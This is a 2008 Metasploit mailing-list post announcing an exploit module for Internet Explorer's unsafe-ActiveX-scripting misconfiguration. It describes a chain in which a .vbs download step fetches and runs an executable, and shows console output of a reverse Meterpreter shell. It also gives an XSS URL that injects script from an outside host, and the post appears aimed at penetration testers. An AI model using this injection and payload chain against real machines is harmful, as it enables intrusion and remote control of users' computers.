Metasploit mailing list archives

Previous By Date Next
Previous By Thread Next

ie_unsafe_scripting.rb exploit module

From: natron at invisibledenizen.org (natron)
Date: Tue, 16 Dec 2008 10:35:39 -0600
All,

I've recently come across environments that have the "Initialize and
script ActiveX controls not marked safe for scripting" configured to
run without prompt for the 'Intranet' or 'Trusted Sites' zones.  This
grants access to WScript.Shell, so my first thought was to add a
little code to ie_createobject, but I discovered that the unsafe
scripting settings doesn't grant access to the MSXML.XMLHTTP, so a
warning dialog still popped.

So, I used Scripting.FileSystemObject to dump commands to a .vbs file,
which then calls MSXML2.XMLHTTP to download the payload.  When
complete, the javascript executes the downloaded file.

msf exploit(ie_unsafe_scripting) > exploit
[*] Exploit running as background job.
[*] Handler binding to LHOST 127.0.0.1
[*] Started reverse handler
[*] Using URL: http://127.0.0.1:8080/ie_unsafe_scripting.js
[*] Server started.
[*] Sending exploit javascript to 127.0.0.1:1422...
[*] Exe will be hOIJa.exe and must be manually removed from the %TEMP%
directory on the target.
[*] Sending EXE payload to 127.0.0.1:1424...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (75776 bytes)
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:1425)
msf exploit(ie_unsafe_scripting) > sessions -i 1
[*] Starting interaction with 1...

getuid
Server username: DOMAIN\USERNAME


Description from the file:

'Name'           => 'Internet Explorer Unsafe Scripting
Misconfiguration Vulnerability',
                        'Description'    => %q{
                                This exploit takes advantage of the "Initialize and script ActiveX
controls not
                        marked safe for scripting" setting within Internet Explorer.  When
this option is set,
                        IE allows access to the WScript.Shell ActiveX control, which allows
javascript to
                        interact with the file system and run commands.  This security flaw
is not uncommon
                        in corporate environments for the 'Intranet' or 'Trusted Site'
zones.  This option
                        does not allow javascript to save binary data to the file system
without a security
                        alert, however, so this module downloads a binary executable
thorugh a .vbs script
                        written to disk and executes.
                        
                                When set via domain policy, the most common registry entry to
modify is HKLM\
                        Software\Policies\Microsoft\Windows\CurrentVersion\Internet
Settings\Zones\1\1201,
                        which if set to '0' forces ActiveX controls not marked safe for
scripting to be enabled
                        for the Intranet zone.
                        
                                This module creates javascript code meant to be included in a
<SCRIPT> tag, such as
                        http://intranet-server/xss.asp?id=";><script%20src=http://10.10.10.10/ie_unsafe_script.js>
                        </script>.
                        },
-------------- next part --------------
A non-text attachment was scrubbed...
Name: ie_unsafe_scripting.rb
Type: application/octet-stream
Size: 5317 bytes
Desc: not available
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20081216/0d612dbe/attachment.obj>
Previous By Date Next
Previous By Thread Next

Current thread: